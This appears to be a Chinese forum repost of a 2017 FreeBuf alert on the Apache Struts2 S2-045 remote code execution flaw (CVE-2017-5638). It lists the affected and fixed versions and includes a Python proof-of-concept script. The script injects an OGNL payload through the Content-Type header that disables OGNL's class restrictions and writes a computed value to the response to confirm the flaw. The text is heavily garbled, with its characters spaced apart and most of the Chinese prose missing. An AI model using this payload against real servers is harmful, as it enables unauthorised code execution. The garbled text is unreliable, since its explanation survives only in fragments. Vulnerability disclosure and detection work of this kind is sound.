搜索

[11103] 2017-03-07_漏洞预警ApacheStruts2曝任意代码执行漏洞(S2-045,CVE-2017-5638)

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-03-07_漏洞预警ApacheStruts2曝任意代码执行漏洞(S2-045,CVE-2017-5638)   |   A p a c h e   S t r u t s 2     ( S 2 - 0 4 5 , C V E - 2 0 1 7 - 5 6 3 8 )   F r e e B u f   2 0 1 7 - 0 3 - 0 7 F r e e B u f S t r u t s   2 R C E J a k a r t a   M u l t i p a r t N i k e   Z h e n g A p a c h e   S t r u t s A p a c h e J a v a   W e b M V C l a b ·   l a b h t t p s : / / w w w . v u l b o x . c o m / l a b ·   w w w . r i s k i v y . c o m l a b 线 线 U R L C V E - 2 0 1 7 - 5 6 3 8 S t r u t s 使 J a k a r t a C o n t e n t - T y p e d e f a u l t . p r o p e r t i e s s t r u t s . m u l t i p a r t . p a r s e r j a k a r t a p e l l c o s j a k a r t a S t r u t s   2 j a k a r t a
S t r u t s   2 . 3 . 5     S t r u t s   2 . 3 . 3 1 S t r u t s   2 . 5     S t r u t s   2 . 5 . 1 0 使 J a k a r t a M u l t i p a r t A p a c h e   S t r u t s   2 . 3 . 3 2 2 . 5 . 1 0 . 1 M u l t i p a r t P o C i m p o r t   r e q u e s t s i m p o r t   s y s d e f   p o c ( u r l ) :         p a y l o a d   =   " % { ( # t e s t = ' m u l t i p a r t / f o r m - d a t a ' ) . ( # d m = @ o g n l . O g n l C o n t e x t @ D E F A U L T _ M E M B E R _ A C C E S S ) . ( # _ m e m b e r A c c e s s ? ( # _ m e m b e r A c c e s s = # d m ) : ( ( # c o n t a i n e r = # c o n t e x t [ ' c o m . o p e n s y m p h o n y . x w o r k 2 . A c t i o n C o n t e x t . c o n t a i n e r ' ] ) . ( # o g n l U t i l = # c o n t a i n e r . g e t I n s t a n c e ( @ c o m . o p e n s y m p h o n y . x w o r k 2 . o g n l . O g n l U t i l @ c l a s s ) ) . ( # o g n l U t i l . g e t E x c l u d e d P a c k a g e N a m e s ( ) . c l e a r ( ) ) . ( # o g n l U t i l . g e t E x c l u d e d C l a s s e s ( ) . c l e a r ( ) ) . ( # c o n t e x t . s e t M e m b e r A c c e s s ( # d m ) ) ) ) . ( # r o s = ( @ o r g . a p a c h e . s t r u t s 2 . S e r v l e t A c t i o n C o n t e x t @ g e t R e s p o n s e ( ) . g e t O u t p u t S t r e a m ( ) ) ) . ( # r o s . p r i n t l n ( 1 0 2 * 1 0 2 * 1 0 2 * 9 9 ) ) . ( # r o s . f l u s h ( ) ) } "         h e a d e r s   =   { }         h e a d e r s [ " C o n t e n t - T y p e " ]   =   p a y l o a d         r   =   r e q u e s t s . g e t ( u r l ,   h e a d e r s = h e a d e r s )         i f   " 1 0 5 0 5 9 5 9 2 "   i n   r . c o n t e n t :                 r e t u r n   T r u e         r e t u r n   F a l s e i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         i f   l e n ( s y s . a r g v )   = =   1 :                 p r i n t   " p y t h o n   s 2 - 0 4 5 . p y   t a r g e t "                 s y s . e x i t ( )         i f   p o c ( s y s . a r g v [ 1 ] ) :                 p r i n t   " v u l n e r a b l e "         e l s e :                 p r i n t   " n o t   v u l n e r a b l e " *   A p a c h e F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理